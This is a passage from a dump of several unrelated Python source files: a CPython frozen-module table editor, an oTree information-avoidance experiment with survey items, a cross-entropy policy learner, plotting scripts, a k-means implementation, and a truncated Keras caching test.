\tdef modifyEntry(self, name:str, code:typing.Union[bytes, bytearray], newName:str = None) -> None:\r\n\t\t\"\"\"Modifies the actual data and marshalled objects in place. There must be enough space for them (the new code/name must consume no more space than the old). It first modifies the data, then the items. You need to call `writeTable` after that!!!\"\"\"\r\n\r\n\t\tif newName and len(newName) > len(name):\r\n\t\t\traise ValueError(\"Not enough space for new name\")\r\n\r\n\t\tel = self[name]\r\n\r\n\t\tif len(code) > el.entry.code_size:\r\n\t\t\traise ValueError(\"Not enough space for new code\")\r\n\r\n\t\tif code is not None:\r\n\t\t\tel._m_code = code\r\n\t\t\tel.entry._m_code_size = len(code)\r\n\t\t\tself.format.map[el.code_offset : (el.code_offset + len(code))] = code\r\n\r\n\t\tif newName is not None:\r\n\t\t\tnewNameL = len(newName)\r\n\t\t\tendNameOffst = el.name_offset + newNameL\r\n\t\t\tzerosLen = len(name) - newNameL + 1\r\n\r\n\t\t\tself.format.map[el.name_offset : endNameOffst] = newName.encode(\"ascii\")\r\n\t\t\tself.format.map[endNameOffst : endNameOffst + zerosLen] = b\"\\0\" * zerosLen\r\n\r\n\t\t\tel._m_name = newName\r\n\t\t\tself.dict[newName] = el\r\n\t\t\tdel (self.dict[name])\r\n\r\n\tdef __getitem__(self, k:str) -> CpythonFrozenTable.TranslatedEntry:\r\n\t\treturn self.dict[k]\r\n\r\n\tdef __contains__(self, k:str) -> bool:\r\n\t\treturn k in self.dict\r\n\r\n\tdef __delitem__(self, k:str) -> None:\r\n\t\tdel (self.dict[k])\r\n\r\n\tdef reorder(self, order:typing.Iterable[str]) -> None:\r\n\t\t\"\"\"Reorders entries in the table. Doesn't change locations of code and names.\"\"\"\r\n\t\tnewItems = []\r\n\t\tfor elName in order:\r\n\t\t\tnewItems.append((elName, self[elName]))\r\n\t\tself.dict = DictT(newItems)\r\n\r\n\tdef remove(self, toRemove:typing.Iterable[str]) -> None:\r\n\t\t\"\"\"Removes entries from the table. Doesn't remove the actual code and names.\"\"\"\r\n\t\tfor elName in toRemove:\r\n\t\t\tif elName in self:\r\n\t\t\t\tdel (self[elName])\r\n","sub_path":"FrozenTable/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"512467245","text":"from otree.api import (\n    models, widgets, BaseConstants, BaseSubsession, BaseGroup, BasePlayer,\n    Currency as c, currency_range\n)\nimport numpy.random\n\n\nauthor = 'Mohin Banker'\n\ndoc = \"\"\"\nThis is an oTree implementation of a lab experiment investigating financial impacts of information avoidance.\n\"\"\"\n\n\nclass Constants(BaseConstants):\n    rounds_per_supergame = 3\n    num_supergames = 1\n    treatments = [\"none\", \"optional\", \"mandatory\"]\n\n    tokens_per_supergame = 30.0\n    num_rounds = num_supergames * rounds_per_supergame\n    name_in_url = 'information_avoidance'\n    players_per_group = None\n\n    probsA = [1.0/21 + 0.004*(10-i) for i in range(0, 21)]\n    probsB = [1.0/21 for i in range(0, 21)]\n    probsC = [1.0/21 + 0.004*(i-10) for i in range(0, 21)]\n\n    multipliers = list(range(0,21))\n\n    values = [\"A\", \"B\", \"C\"]\n\nclass Subsession(BaseSubsession):\n    initial_round = models.BooleanField(doc = \"True iff current round is the first round of a supergame\")\n    subgames = models.IntegerField(doc = \"The number of rounds per supergame shown to the player\")\n    show_round = models.BooleanField(doc = \"True iff participant is shown the round of the game. 
Otherwise, the round is skipped for fewer subgames.\")\n tokens_per_subgame = models.IntegerField(doc = \"Number of tokens endowed at each subgame\")\n\n def before_session_starts(self):\n self.initial_round = ((self.round_number - 1) % Constants.rounds_per_supergame) == 0\n self.subgames = int(self.session.config[\"rounds_in_supergame\"])\n self.show_round = ((self.round_number-1) % Constants.rounds_per_supergame) < self.subgames\n self.tokens_per_subgame = round(Constants.tokens_per_supergame/self.subgames)\n\n # Equally distribute treatments among players\n for i in range(len(self.get_players())):\n p = self.get_players()[i]\n p.treatment = Constants.treatments[i % len(Constants.treatments)]\n\n # Takes in gamble choice and return multiplier\n def sim_gamble(self, choice):\n multiplier = 0\n if (choice == \"A\"):\n multiplier = numpy.random.choice(Constants.multipliers, 1, p = Constants.probsA)\n elif (choice == \"B\"):\n multiplier = numpy.random.choice(Constants.multipliers, 1, p = Constants.probsB)\n elif (choice == \"C\"):\n multiplier = numpy.random.choice(Constants.multipliers, 1, p = Constants.probsC)\n\n multiplier = multiplier.item()\n return(multiplier/10.0)\n\n\n\n\nclass Group(BaseGroup):\n pass\n\n\nclass Player(BasePlayer):\n treatment = models.CharField(doc = \"The treatment assigned to the player\")\n information_shown = models.BooleanField(\n initial = None,\n blank = True,\n choices = [[True, \"Yes\"], [False, \"No\"]],\n widget = widgets.RadioSelect(),\n doc = \"True iff the player opted in to see information\")\n\n investment = models.IntegerField(doc = \"How many tokens the player chose to invest\")\n not_invested = models.IntegerField(doc = \"Number of tokens not invested\")\n investment_return = models.IntegerField(doc = \"Net profit from player's investment\")\n earned = models.IntegerField(doc = \"The payoff of the investment (gross)\")\n revenue = models.IntegerField(doc = \"Sum of earned tokens and non-invested tokens\")\n previous_payoff = models.IntegerField(doc = \"Total tokens earned before the current round\")\n multiplier = models.FloatField(doc = \"Multiplier used for investment outcome\")\n chosen_option = models.CharField(\n initial = None,\n choices = Constants.values,\n blank = False,\n widget = widgets.RadioSelect(),\n doc = \"The lottery game chosen by the player in this round\")\n \n previous_option = models.CharField(\n initial = None,\n choices = Constants.values,\n blank = False,\n widget = widgets.RadioSelect(),\n doc = \"The lottery game chosen by the player in the previous round\")\n \n info_option = models.CharField(initial = None, doc = \"Gamble that player chose to view information for\")\n info_investment = models.IntegerField(initial = None, doc = \"Amount invested in information scenario\")\n info_not_invested = models.IntegerField(doc = \"Number of tokens not invested\")\n info_investment_return = models.IntegerField(initial = None, doc = \"Net profit from information investment\")\n info_earned = models.IntegerField(initial = None, doc = \"Sum of investment and investment return\")\n info_earned_total = models.IntegerField(initial = None, doc = \"Total tokens earned in this round\")\n info_multiplier = models.FloatField(doc = \"Multiplier used for investment in information scenario\")\n info_total_invested = models.IntegerField(doc = \"Sum of investments across gambles in simulated information\")\n info_revenue = models.IntegerField(doc = \"Sum of earned tokens and non-invested tokens\")\n\n infoavoidance1 = 
models.PositiveIntegerField(\n initial = None,\n blank = True,\n choices = [[1,\"Definitely don't want to know\"], [2, \"Probably don't want to know\"], [3, \"Probably want to know\"], [4, \"Definitely want to know\"]],\n verbose_name = \"As part of a semi-annual medical checkup, your doctor asks you a series of questions. The answers to these questions can be used to estimate your life expectancy (the age you are predicted to live to). Do you want to know how long you can expect to live?\",\n widget = widgets.RadioSelect())\n infoavoidance2 = models.PositiveIntegerField(\n initial = None,\n blank = True,\n choices = [[1,\"Definitely don't want to know\"], [2, \"Probably don't want to know\"], [3, \"Probably want to know\"], [4, \"Definitely want to know\"]],\n verbose_name = \"You provide some genetic material to a testing service to learn more about your ancestors. You are then told that the same test can, at no additional cost, tell you whether you have an elevated risk of developing Alzheimer's. Do you want to know whether you have a high risk of developing Alzheimer's?\",\n widget = widgets.RadioSelect())\n infoavoidance3 = models.PositiveIntegerField(\n initial = None,\n blank = True,\n choices = [[1,\"Definitely don't want to know\"], [2, \"Probably don't want to know\"], [3, \"Probably want to know\"], [4, \"Definitely want to know\"]],\n verbose_name = \"At your annual checkup, you are given the option to see the results of a diagnostic test which can identify, among other things, the extent to which your body has suffered long-term effects from stress. Do you want to know how much lasting damage your body has suffered from stress?\",\n widget = widgets.RadioSelect())\n infoavoidance4 = models.PositiveIntegerField(\n initial = None,\n blank = True,\n choices = [[1,\"Definitely don't want to know\"], [2, \"Probably don't want to know\"], [3, \"Probably want to know\"], [4, \"Definitely want to know\"]],\n verbose_name = \"Ten years ago, you had the opportunity to invest in two retirement funds: Fund A and Fund B. For the past 10 years, you have invested all your retirement savings in Fund A. Do you want to know the balance you would have, if you had invested in Fund B instead?\",\n widget = widgets.RadioSelect())\n infoavoidance5 = models.PositiveIntegerField(\n initial = None,\n blank = True,\n choices = [[1,\"Definitely don't want to know\"], [2, \"Probably don't want to know\"], [3, \"Probably want to know\"], [4, \"Definitely want to know\"]],\n verbose_name = \"You decide to go to the theater for your birthday and give your close friend (or partner) your credit card so they can purchase tickets for the two of you, which they do. You aren't sure, but suspect that the tickets may have been expensive. Do you want to know how much the tickets cost?\",\n widget = widgets.RadioSelect())\n infoavoidance6 = models.PositiveIntegerField(\n initial = None,\n blank = True,\n choices = [[1,\"Definitely don't want to know\"], [2, \"Probably don't want to know\"], [3, \"Probably want to know\"], [4, \"Definitely want to know\"]],\n verbose_name = \"You bought an electronic appliance at a store at what seemed like a reasonable, though not particularly low, price. A month has passed, and the item is no longer returnable. You see the same appliance displayed in another store with a sign announcing 'SALE.' 
Do you want to know the price you could have bought it for?\",\n widget = widgets.RadioSelect())\n infoavoidance7 = models.PositiveIntegerField(\n initial = None,\n blank = True,\n choices = [[1,\"Definitely don't want to know\"], [2, \"Probably don't want to know\"], [3, \"Probably want to know\"], [4, \"Definitely want to know\"]],\n verbose_name = \"You gave a close friend one of your favorite books for her birthday. Visiting her apartment a couple of months later, you notice the book on her shelf. She never said anything about it; do you want to know if she liked the book?\",\n widget = widgets.RadioSelect())\n infoavoidance8 = models.PositiveIntegerField(\n initial = None,\n blank = True,\n choices = [[1,\"Definitely don't want to know\"], [2, \"Probably don't want to know\"], [3, \"Probably want to know\"], [4, \"Definitely want to know\"]],\n verbose_name = \"Someone has described you as quirky, which could be interpreted in a positive or negative sense. Do you want to know which interpretation he intended?\",\n widget = widgets.RadioSelect())\n infoavoidance9 = models.PositiveIntegerField(\n initial = None,\n blank = True,\n choices = [[1,\"Definitely don't want to know\"], [2, \"Probably don't want to know\"], [3, \"Probably want to know\"], [4, \"Definitely want to know\"]],\n verbose_name = \"You gave a toast at your best friend’s wedding. Your best friend says you did a good job, but you aren’t sure if he or she meant it. Later, you overhear people discussing the toasts. Do you want to know what people really thought of your toast?\",\n widget = widgets.RadioSelect())\n infoavoidance10 = models.PositiveIntegerField(\n initial = None,\n blank = True,\n choices = [[1,\"Definitely don't want to know\"], [2, \"Probably don't want to know\"], [3, \"Probably want to know\"], [4, \"Definitely want to know\"]],\n verbose_name = \"As part of a fund-raising event, you agree to post a picture of yourself and have people guess your age (the closer they get, the more they win). At the end of the event, you have the option to see people's guesses. Do you want to learn how old people guessed that you are?\",\n widget = widgets.RadioSelect())\n infoavoidance11 = models.PositiveIntegerField(\n initial = None,\n blank = True,\n choices = [[1,\"Definitely don't want to know\"], [2, \"Probably don't want to know\"], [3, \"Probably want to know\"], [4, \"Definitely want to know\"]],\n verbose_name = \"You have just participated in a psychological study in which all the participants rate one-anothers' attractiveness. The experimenter gives you an option to see the results for how people rated you. Do you want to know how attractive other people think you are?\",\n widget = widgets.RadioSelect())\n infoavoidance12 = models.PositiveIntegerField(\n initial = None,\n blank = True,\n choices = [[1,\"Definitely don't want to know\"], [2, \"Probably don't want to know\"], [3, \"Probably want to know\"], [4, \"Definitely want to know\"]],\n verbose_name = \"Some people seek out information even when it might be painful. Others avoid getting information that they suspect might be painful, even if it could be useful. 
How would you describe yourself?\",\n        widget = widgets.RadioSelect())\n    infoavoidance13 = models.PositiveIntegerField(\n        initial = None,\n        blank = True,\n        choices = [[4,\"Strongly disagree\"], [3, \"Somewhat disagree\"], [2, \"Somewhat agree\"], [1, \"Strongly agree\"]],\n        verbose_name = \"If people know bad things about my life that I don't know, I would prefer not to be told.\",\n        widget = widgets.RadioSelect())\n\n    riskpreferences1 = models.PositiveIntegerField(\n        initial = None,\n        blank = True)\n\n    econ_exp = models.BooleanField(initial = None, blank = True)\n    marketing_exp = models.BooleanField(initial = None, blank = True)\n    law_exp = models.BooleanField(initial = None, blank = True)\n\n    is_male = models.BooleanField(\n        initial = None, \n        blank = True,\n        verbose_name = \"What is your gender?\",\n        choices = [[True, \"Male\"], [False, \"Female\"]])\n    english = models.CharField(\n        initial = None, \n        blank = True,\n        verbose_name = \"Is English your primary language\",\n        choices = [\"Yes\", \"No\", \"Prefer not to answer\"],\n        widget = widgets.RadioSelect())\n    age = models.PositiveIntegerField(\n        initial = None, \n        blank = True,\n        verbose_name = \"How old are you?\",\n        widget = widgets.SliderInput(attrs={'step':1}, show_value = False),\n        min = 18,\n        max = 100)","sub_path":"information_avoidance/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":13080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"469918008","text":"import gym\nfrom gym import wrappers, logger\nimport numpy as np\nimport pickle\nimport json, sys, os\nfrom os import path\n\nimport argparse\n'''\nsolve a continuous-state, binary-action decision problem with the cross-entropy method\n'''\nclass CELearning:\n    def __init__(self, env, elite_frac=0.2, batch_size=25, max_iter=10):\n        self.env = env\n        self.elite_frac = elite_frac\n        self.batch_size = batch_size\n        self.max_iter = max_iter\n        state_dim = env.observation_space.shape[0]\n        self.theta = np.zeros(state_dim + 1) # plus bias\n\n    def select_action(self, state, theta):\n        w = theta[:-1]\n        b = theta[-1]\n        y = state.dot(w) + b\n        a = int(y < 0)\n        return a # 0 or 1\n\n    def get_reward(self, theta, num_steps=200):\n        total_reward = 0\n        state = self.env.reset()\n        for t in range(num_steps):\n            action = self.select_action(state, theta)\n            state, reward, done, _ = self.env.step(action)\n            total_reward += reward\n            if done:\n                break\n        return total_reward\n\n    def train(self):\n        n_elite = int(self.batch_size * self.elite_frac)\n        theta_std = np.ones(self.theta.shape)\n        theta_size = self.theta.size\n        for i in range(self.max_iter):\n            theta_list = np.array([self.theta + dth for dth in theta_std[None,:] * \\\n                np.random.randn(self.batch_size, theta_size)])\n            reward_list = np.array([self.get_reward(theta) for theta in theta_list])\n            elite_indexes = reward_list.argsort()[::-1][:n_elite]\n            elite_theta_list = theta_list[elite_indexes]\n            self.theta = elite_theta_list.mean(axis=0)\n            theta_std = elite_theta_list.std(axis=0)\n\n    def predict(self, state):\n        # given the current state, select the best action\n        return self.select_action(state, self.theta)\n\n\n","sub_path":"pa4/policy_learning.py","file_name":"policy_learning.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"419681139","text":"import matplotlib.pyplot as plt \n\nfrom random_walk import RandomWalk \n\n\n# Make a random walk\nrw = RandomWalk(500)\nrw.fill_walk()\n\n
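# fill_walk() is assumed to populate rw.x_values and rw.y_values with the\n# coordinates of every step, so plotting them in order traces the walk.\n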
walk\n\nplt.style.use('classic')\nfig, ax = plt.subplots()\npoint_numbers = range(rw.num_points)\nax.plot(rw.x_values, rw.y_values, linewidth=0.5) \n\n# Remove the axes\nax.get_xaxis().set_visible(False) \nax.get_yaxis().set_visible(False)\n\nplt.show()\n","sub_path":"molecular_motion.py","file_name":"molecular_motion.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"374100066","text":"#a;lsk;lkajd make the imports\n#Hello world\n###test\n#Hello\n#Hello world\n#lkj;lkj\n#test1\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy import io, signal # we will also import the signal module, from s\ndef plot_spectrogram(spg, t, f, freq_lims=[0,100], plot_db=False):\n plt.figure(figsize=(15,4))\n if plot_db:\n plt.imshow(10*np.log10(spg), aspect='auto', extent=[t[0], t[-1], f[-1], f[0]])\n else:\n plt.imshow(spg, aspect='auto', extent=[t[0], t[-1], f[-1], f[0]])\n plt.xlabel('Time'); plt.ylabel('Frequency(Hz)');\n plt.ylim(freq_lims)\n plt.colorbar()\n plt.tight_layout()\n\nT, fs = 20, 1000\nt = np.arange(0,T,1/float(fs))\n# simulate a signal\n# refer to the function documentation for f0, t1, f1\nsig = signal.chirp(t, f0=10, t1=20,f1=30)\n\n# plot it\nplt.figure(figsize=(15,3))\nplt.plot(t,sig)\nplt.xlim([0,5])\nplt.xlabel('Time (s)'); plt.ylabel('Voltage (V)');\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"341447412","text":"import matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MaxNLocator\nimport numpy as np\nimport pandas as pd\nimport random\nfrom copy import deepcopy\nfrom sklearn.preprocessing import MinMaxScaler\nimport Functions as fun\n\nK_NUMBER = 5\nMAX_NUMBER_OF_EPOCHS = 15\ncolors = ['r', 'g', 'b', 'y', 'c', 'm', 'purple', 'orange', 'navy', 'turquoise', 'aquamarine', 'gray', 'darkgreen']\nchosen_marker = 'x'\nscale = 150\n\nplt.figure(figsize=(10, 6))\n\ndef plot(filename, all_data, clusters, cent_plot, epochs):\n if filename == 'iris.data':\n plot_irises(filename, all_data, clusters, cent_plot, epochs)\n elif filename == 'wine.data':\n plot_wines(filename, all_data, clusters, cent_plot, epochs)\n elif filename == 'forestfires.csv':\n plot_forestfires(filename, all_data, clusters, cent_plot, epochs) \n\ndef plot_irises(filename, all_data, clusters, cent_plot, epochs):\n \"\"\"Make a plot for iris.data\"\"\"\n plt.subplot(2,2,1)\n for i in range(K_NUMBER):\n points = np.array([all_data[j] for j in range(len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 0], points[:, 1], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 0], cent_plot[:, 1], marker=chosen_marker, s=scale, c='black', label = 'centroids')\n plt.xlabel('sepal length')\n plt.ylabel('sepal width')\n plt.legend()\n\n plt.subplot(2,2,2)\n for i in range(K_NUMBER):\n points = np.array([all_data[j] for j in range(len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 2], points[:, 3], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 2], cent_plot[:, 3], marker=chosen_marker, s=scale, c='black', label = 'centroids')\n plt.xlabel('petal length')\n plt.ylabel('petal width')\n plt.legend()\n \n plt.suptitle('K-means, epochs: ' + str(epochs) + '\\n' + filename) \n\ndef plot_wines(filename, all_data, clusters, cent_plot, epochs):\n \"\"\"Make a plot for wine.data\"\"\"\n plt.subplot(3, 3, 1)\n for i in range(K_NUMBER):\n points = 
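The test.py record above defines plot_spectrogram but never calls it. A short usage sketch, assuming the helper from that file is in scope; note that scipy.signal.spectrogram returns (frequencies, times, spectrogram) while the helper expects its arguments in (spg, t, f) order:

```python
import numpy as np
from scipy import signal

fs = 1000
t = np.arange(0, 20, 1 / fs)
sig = signal.chirp(t, f0=10, t1=20, f1=30)

# scipy returns (f, t, Sxx); the helper takes (spg, t, f), so unpack carefully.
f_spg, t_spg, spg = signal.spectrogram(sig, fs=fs, nperseg=512)
plot_spectrogram(spg, t_spg, f_spg, freq_lims=[0, 50], plot_db=True)
```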
np.array([all_data[j] for j in range(\n len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 0], points[:, 12], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 0], cent_plot[:, 12],\n marker=chosen_marker, s=scale, c='black', label = 'centroids')\n plt.xlabel('alcohol')\n plt.ylabel('proline')\n plt.legend()\n\n plt.subplot(3, 3, 2)\n for i in range(K_NUMBER):\n points = np.array([all_data[j] for j in range(\n len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 1], points[:, 4], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 1], cent_plot[:, 4],\n marker=chosen_marker, s=scale, c='black', label = 'centroids')\n plt.xlabel('malic acid')\n plt.ylabel('magnesium')\n plt.legend()\n\n plt.subplot(3, 3, 3)\n for i in range(K_NUMBER):\n points = np.array([all_data[j] for j in range(\n len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 2], points[:, 3], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 2], cent_plot[:, 3],\n marker=chosen_marker, s=scale, c='black', label = 'centroids')\n plt.xlabel('ash')\n plt.ylabel('alcality of ash')\n plt.legend() \n\n plt.subplot(3, 3, 4)\n for i in range(K_NUMBER):\n points = np.array([all_data[j] for j in range(\n len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 6], points[:, 5], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 6], cent_plot[:, 5],\n marker=chosen_marker, s=scale, c='black', label = 'centroids')\n plt.xlabel('flavanoids')\n plt.ylabel('total phenols')\n plt.legend() \n\n plt.subplot(3, 3, 5)\n for i in range(K_NUMBER):\n points = np.array([all_data[j] for j in range(\n len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 6], points[:, 8], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 6], cent_plot[:, 8],\n marker=chosen_marker, s=scale, c='black', label = 'centroids')\n plt.xlabel('flavanoids')\n plt.ylabel('proanthocyanins')\n plt.legend() \n\n plt.subplot(3, 3, 6)\n for i in range(K_NUMBER):\n points = np.array([all_data[j] for j in range(\n len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 9], points[:, 10], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 9], cent_plot[:, 10],\n marker=chosen_marker, s=scale, c='black', label = 'centroids')\n plt.xlabel('color intensity')\n plt.ylabel('hue')\n plt.legend() \n\n plt.subplot(3, 3, 7)\n for i in range(K_NUMBER):\n points = np.array([all_data[j] for j in range(\n len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 11], points[:, 12], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 11], cent_plot[:, 12],\n marker=chosen_marker, s=scale, c='black', label = 'centroids')\n plt.xlabel('OD280/OD315 of diluted wines')\n plt.ylabel('proline')\n plt.legend() \n\n plt.suptitle('K-means, epochs: ' + str(epochs) + '\\n' + filename) \n\ndef plot_forestfires(filename, all_data, clusters, cent_plot, epochs):\n \"\"\"Make a plot for forestfires.csv\"\"\"\n plt.subplot(3,3,1)\n for i in range(K_NUMBER):\n points = np.array([all_data[j] for j in range(len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 2], points[:, 3], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 2], cent_plot[:, 3], marker=chosen_marker, s=scale, c='black', label='centroids')\n plt.xlabel('FFMC')\n plt.ylabel('DMC')\n plt.legend()\n \n plt.subplot(3,3,2)\n for i in range(K_NUMBER):\n points = np.array([all_data[j] for j in range(len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 3], points[:, 4], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 3], cent_plot[:, 4], marker=chosen_marker, s=scale, c='black', label='centroids')\n plt.xlabel('DMC')\n plt.ylabel('DC')\n plt.legend()\n 
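Each subplot block in plot_wines (and in plot_forestfires below) repeats the same scatter/centroid/label calls with only the column indices and axis names changing. A sketch of the same behavior as data plus one loop; it assumes the module globals defined above (K_NUMBER, colors, chosen_marker, scale):

```python
import numpy as np
import matplotlib.pyplot as plt

def plot_feature_pairs(all_data, clusters, cent_plot, pairs, grid):
    """pairs: list of (x_col, y_col, x_label, y_label); grid: (rows, cols)."""
    for idx, (xc, yc, xl, yl) in enumerate(pairs, start=1):
        plt.subplot(grid[0], grid[1], idx)
        for i in range(K_NUMBER):
            points = np.array([all_data[j] for j in range(len(all_data))
                               if clusters[j] == i])
            plt.scatter(points[:, xc], points[:, yc], s=7, c=colors[i])
        plt.scatter(cent_plot[:, xc], cent_plot[:, yc], marker=chosen_marker,
                    s=scale, c='black', label='centroids')
        plt.xlabel(xl)
        plt.ylabel(yl)
        plt.legend()

# e.g. the first three wine panels:
# plot_feature_pairs(all_data, clusters, cent_plot,
#                    [(0, 12, 'alcohol', 'proline'),
#                     (1, 4, 'malic acid', 'magnesium'),
#                     (2, 3, 'ash', 'alcality of ash')], grid=(3, 3))
```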
\n plt.subplot(3,3,3)\n for i in range(K_NUMBER):\n points = np.array([all_data[j] for j in range(len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 3], points[:, 10], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 3], cent_plot[:, 10], marker=chosen_marker, s=scale, c='black', label='centroids')\n plt.xlabel('DMC')\n plt.ylabel('burned area')\n plt.legend()\n \n plt.subplot(3,3,7)\n for i in range(K_NUMBER):\n points = np.array([all_data[j] for j in range(len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 4], points[:, 5], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 4], cent_plot[:, 5], marker=chosen_marker, s=scale, c='black', label='centroids')\n plt.xlabel('DC')\n plt.ylabel('ISI')\n plt.legend()\n \n plt.subplot(3,3,8)\n for i in range(K_NUMBER):\n points = np.array([all_data[j] for j in range(len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 6], points[:, 7], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 6], cent_plot[:, 7], marker=chosen_marker, s=scale, c='black', label='centroids')\n plt.xlabel('temperature')\n plt.ylabel('humidity')\n plt.legend()\n \n plt.subplot(3,3,9)\n for i in range(K_NUMBER):\n points = np.array([all_data[j] for j in range(len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 8], points[:, 9], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 8], cent_plot[:, 9], marker=chosen_marker, s=scale, c='black', label='centroids')\n plt.xlabel('wind')\n plt.ylabel('rain')\n plt.legend()\n\n plt.suptitle('K-means, epochs: ' + str(epochs) + '\\n' + filename) \n \ndef plot_error(errors):\n plt.clf()\n plt.plot(list(range(1, len(errors) + 1)), errors)\n plt.xlabel('Epoch')\n plt.ylabel('Quantization error')\n plt.title('Error')\n plt.xticks(range(1, len(errors) + 1))\n\ndef Kmeans(filename):\n \"\"\"Implementation of k-means algorithm\"\"\"\n all_data = fun.data_alloc(filename)\n scaler = MinMaxScaler(feature_range = (0, 1))\n all_data = scaler.fit_transform(all_data)\n\n centroids = fun.pick_random_elements(all_data.tolist(), K_NUMBER)\n\n all_data_array = np.asarray(all_data)\n all_data = scaler.inverse_transform(all_data)\n cent_old = []\n clusters = np.zeros(len(all_data_array))\n pom = 0\n epochs = 0\n centroid_centerOfMass_distance = fun.dist(centroids, 0, None)\n wynik = []\n errors = []\n while centroid_centerOfMass_distance != 0 and epochs != MAX_NUMBER_OF_EPOCHS:\n epochs += 1\n for i in range(len(all_data_array)):\n distances = fun.dist(all_data_array[i], centroids)\n clusters[i] = np.argmin(distances) \n cent_old = deepcopy(centroids)\n \n for i in range(K_NUMBER):\n points = [all_data_array[j] for j in range(len(all_data_array)) if clusters[j] == i]\n centroids[i] = np.mean(points, axis=0)\n pom = 0\n for x in range(len(points)):\n pom += fun.dist(points[x],centroids[i],None) \n wynik.append(pom) \n \n centroid_centerOfMass_distance = fun.dist(centroids, cent_old, None)\n errors.append(centroid_centerOfMass_distance)\n cent_plot = scaler.inverse_transform(centroids)\n \n plt.clf()\n # plot(filename, all_data, clusters, cent_plot, epochs)\n # plt.savefig('plots\\\\kmeans_' + filename.split('.')[0] + str(epochs) + '.png', dpi=100)\n # plt.pause(0.03) \n print(\"Number of epochs: \" + str(epochs))\n print(\" \")\n print(\"_____________________\")\n print(\"Epoch: 0\")\n print(\"---------------------\")\n for i in range(len(wynik)):\n if(i%K_NUMBER==0 and i!=0):\n print(\"_____________________\")\n print(\"Epoch: \"+ str(i/K_NUMBER))\n print(\"---------------------\")\n print(wynik[i])\n else:\n print(wynik[i])\n # input(\"Press 
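The Kmeans routine in this record leans on fun.dist from a Functions module that is not shown. A plain-NumPy sketch of the assignment/update pass it performs, including the per-cluster quantization error that the code accumulates in `wynik`:

```python
import numpy as np

def kmeans_step(data, centroids):
    """One assignment + update pass; a NumPy sketch of what the loop above
    does with fun.dist and np.argmin. data: (n, d), centroids: (k, d)."""
    # Squared distance from every point to every centroid, shape (n, k).
    d2 = ((data[:, None, :] - centroids[None, :, :]) ** 2).sum(axis=2)
    clusters = d2.argmin(axis=1)
    new_centroids = np.array([
        data[clusters == i].mean(axis=0) if np.any(clusters == i) else centroids[i]
        for i in range(len(centroids))])
    # Per-cluster quantization error, analogous to the `wynik` values printed later.
    errors = [np.linalg.norm(data[clusters == i] - new_centroids[i], axis=1).sum()
              for i in range(len(centroids))]
    return clusters, new_centroids, errors
```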
Enter to continue...\")\n plot_error(errors)\n # plt.savefig('plots\\\\kmeans_errors.png', dpi=100)\n # plt.pause(0.03)\n # input(\"Press Enter to continue...\")","sub_path":"Zad1/Kmeans.py","file_name":"Kmeans.py","file_ext":"py","file_size_in_byte":9957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"39905960","text":"from holdouts_generator import cached_holdouts_generator, skip, store_keras_result, load_result, add_work_in_progress\nfrom typing import Tuple, Dict\nfrom sklearn.datasets import load_iris\nfrom .utils import example_random_holdouts, clear_all_cache\nfrom tensorflow.keras import Sequential\nfrom tensorflow.keras.layers import Dense\nimport time\nimport pytest\n\ndef mlp()->Sequential:\n model = Sequential([\n *[Dense(units=10) for kwargs in range(3)],\n Dense(1, activation=\"sigmoid\"),\n ])\n model.compile(\n optimizer=\"nadam\",\n loss=\"mse\"\n )\n return model\n\n\ndef train(training: Tuple, testing: Tuple, hyper_parameters: Dict):\n start = time.time()\n model = mlp()\n parameters = {\n \"shuffle\": True\n }\n history = model.fit(\n *training,\n **hyper_parameters,\n **parameters,\n validation_data=testing,\n verbose=0\n ).history\n return {\n \"history\": history,\n \"x_train\": training[0],\n \"y_train_true\": training[1],\n \"x_test\": testing[0],\n \"y_test_true\": testing[1],\n \"model\": model,\n \"time\": time.time() - start,\n \"cache_dir\":\"holdouts\",\n \"results_directory\":\"results\",\n \"hyper_parameters\": hyper_parameters,\n \"parameters\": parameters\n }\n\n\ndef test_keras_cache():\n clear_all_cache(results_directory=\"results\", cache_dir=\"holdouts\")\n\n X, y = load_iris(return_X_y=True)\n X = 